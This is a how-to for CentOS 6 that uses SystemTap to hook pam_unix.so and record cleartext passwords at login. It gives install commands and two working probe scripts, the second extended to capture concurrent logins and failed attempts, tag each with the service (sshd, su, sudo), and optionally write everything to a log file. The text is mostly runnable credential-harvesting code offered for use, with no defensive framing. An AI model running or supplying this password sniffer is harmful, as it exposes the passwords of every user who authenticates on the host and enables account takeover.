Test environment:
Linux 2.6.32-754.25.1.el6.x86_64
CentOS release 6.10 (Final)
First install the systemtap package.
The idea is to hook function calls inside the PAM module pam_unix.so, because password-based login authentication (sshd, login, su and friends) goes through that library: pam_unix receives the cleartext password from the PAM conversation and only then hashes and compares it, so a probe on the verification function's entry sees the plaintext. SystemTap builds a kernel module for each script, so besides the pam debuginfo below (needed to resolve the function's parameters) it also needs kernel-devel and kernel-debuginfo matching the running kernel; `stap-prep` reports what is missing.
yum --releasever=6.4 update
yum install -y systemtap
debuginfo-install $(rpm -qf /lib64/security/pam_unix.so)   # x86_64 (the test environment above); on a 32-bit system the path is /lib/security/pam_unix.so
touch /root/capture_pass.stp
Insert the following code:
#!/usr/bin/stap
# username/pass buffer the arguments seen on entry so the .return probe,
# which only sees $return, can print them; isSuccRet is cleared on success.
global username, pass, isSuccRet = 1;
# The test environment above is x86_64, so the module lives under /lib64;
# on a 32-bit system use /lib/security/pam_unix.so instead.
probe process("/lib64/security/pam_unix.so").function("_unix_verify_password")
{
    # _unix_verify_password(pamh, name, p, ctrl): $p is the cleartext password
    # handed over by the PAM conversation, before pam_unix hashes it.
    username = user_string($name);
    pass = user_string($p);
}
probe process("/lib64/security/pam_unix.so").function("_unix_verify_password").return
{
    if ($return == 0)      # PAM_SUCCESS: the password matched
    {
        printf("User: %s\nPassword: %s\n\n", username, pass);
        isSuccRet = 0;
    }
}
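The script above keeps a single global username/pass pair, so when two logins are being verified at the same time (sshd forks a separate child per connection) the second entry probe overwrites the first pair before its .return probe fires, and the wrong password gets printed next to a username. The following is an added example, not the original post's script, that keys the buffered values by thread id, logs failed attempts as well as successful ones, and uses user_string_quoted so a bad pointer does not abort the probe. It assumes the x86_64 library path /lib64/security/pam_unix.so; the function name and parameter names are those of pam_unix's _unix_verify_password.

```systemtap
#!/usr/bin/stap
# Added example: per-thread capture of pam_unix password checks.
# Assumption: x86_64 layout, module at /lib64/security/pam_unix.so.

# Indexed by tid(), so concurrent verifications cannot clobber each other.
global creds_user, creds_pass

probe process("/lib64/security/pam_unix.so").function("_unix_verify_password")
{
    # $name and $p are the const char* parameters of
    # _unix_verify_password(pamh, name, p, ctrl). user_string_quoted returns
    # a placeholder instead of raising an error if the pointer is unreadable.
    creds_user[tid()] = user_string_quoted($name)
    creds_pass[tid()] = user_string_quoted($p)
}

probe process("/lib64/security/pam_unix.so").function("_unix_verify_password").return
{
    t = tid()
    # Nothing buffered for this thread (probe attached mid-call): skip it.
    if (!([t] in creds_user)) next

    # PAM_SUCCESS is 0; any other value is a PAM error code (e.g. PAM_AUTH_ERR).
    verdict = ($return == 0) ? "SUCCESS" : sprintf("FAIL(%d)", $return)

    printf("%s pid=%d comm=%s %s user=%s pass=%s\n",
           ctime(gettimeofday_s()), pid(), execname(), verdict,
           creds_user[t], creds_pass[t])

    # Free the entries so the arrays never grow across many logins.
    delete creds_user[t]
    delete creds_pass[t]
}
```

Run it as root with `stap -v /root/capture_pass.stp` (or `stap -o /var/log/pam_capture.log ...` to write to a file); because of the `pid`/`comm` fields the output also shows which service (sshd, su, sudo, login) performed the check, which the original script's two-line format does not.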